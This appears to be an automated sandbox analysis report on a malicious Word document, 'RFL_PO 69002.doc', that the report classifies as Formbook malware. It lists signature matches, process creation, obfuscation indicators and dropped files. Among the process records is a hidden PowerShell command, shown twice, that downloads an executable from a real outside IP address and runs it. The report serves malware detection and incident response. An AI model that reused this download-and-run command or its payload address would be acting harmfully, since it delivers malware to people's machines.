Source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: nothinglittle.exe.9.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@8/13@0/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3492:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{BCE875CA-B705-4E9B-879E-D1A9B6F412E9} - OProcSessId.dat Jump to behavior
Source: RFL_PO 69002.doc OLE indicator, Word Document stream: true
Source: RFL_PO 69002.doc OLE document summary: title field not present or empty
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: RFL_PO 69002.doc Virustotal: Detection: 15%
Source: RFL_PO 69002.doc ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\Documents\nothinglittle.exe C:\Users\Public\Documents\nothinglittle.exe
Source: C:\Users\Public\Documents\nothinglittle.exe Process created: C:\Users\user\AppData\Local\Temp\nothinglittle.exe C:\Users\user\AppData\Local\Temp\nothinglittle.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\Documents\nothinglittle.exe C:\Users\Public\Documents\nothinglittle.exe Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process created: C:\Users\user\AppData\Local\Temp\nothinglittle.exe C:\Users\user\AppData\Local\Temp\nothinglittle.exe Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.488460659.0000000006560000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: nothinglittle.exe, 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: nothinglittle.exe
Source: Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.488460659.0000000006560000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Yara detected Costura Assembly Loader
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000008.00000003.269897366.00000246F5519000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.275702172.0000000000D12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.431614413.00000000007D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.491282271.00000000007D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.269964305.00000246F5559000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.432793873.0000000000D12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.270059630.00000246F555A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.430227602.0000000001416000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432322254.00000000007D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: nothinglittle.exe PID: 6988, type: MEMORY
Source: Yara match File source: Process Memory Space: nothinglittle.exe PID: 6172, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe, type: DROPPED
Source: Yara match File source: 9.2.nothinglittle.exe.d10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.nothinglittle.exe.d10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.nothinglittle.exe.7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.nothinglittle.exe.7d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.nothinglittle.exe.7d0000.0.unpack, type: UNPACKEDPE
Binary contains a suspicious time stamp
Source: nothinglittle.exe.9.dr Static PE information: 0xD669075E [Tue Dec 28 08:16:30 2083 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\Documents\nothinglittle.exe Code function: 9_2_03024E5C pushad ; iretd 9_2_03024E5D
Source: C:\Users\Public\Documents\nothinglittle.exe Code function: 9_2_03025265 push ecx; retf 9_2_0302526C
Source: C:\Users\Public\Documents\nothinglittle.exe Code function: 9_2_030262B5 push 8BFFFFFEh; retf 9_2_030262BB
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_00417B68 push ebx; ret 28_2_00417B69
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0041CEB5 push eax; ret 28_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0041CF6C push eax; ret 28_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0041CF02 push eax; ret 28_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0041CF0B push eax; ret 28_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_004167E2 push esi; retf 28_2_004167F5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0040C78D push ecx; iretd 28_2_0040C78E
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012DD0D1 push ecx; ret 28_2_012DD0E4
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0126322C push eax; retf 28_2_0126321C
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01269271 push es; iretd 28_2_01269278
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0126427E pushad ; retf 000Dh 28_2_0126427F
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0126225E push eax; retf 28_2_0126321C
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01264288 pushad ; retf 28_2_01264289
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0126A7C0 push es; iretd 28_2_0126A7C1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01263F9F pushad ; ret 28_2_01263FA0
Source: initial sample Static PE information: section name: .text entropy: 7.99300765862

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\Public\Documents\nothinglittle.exe File created: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
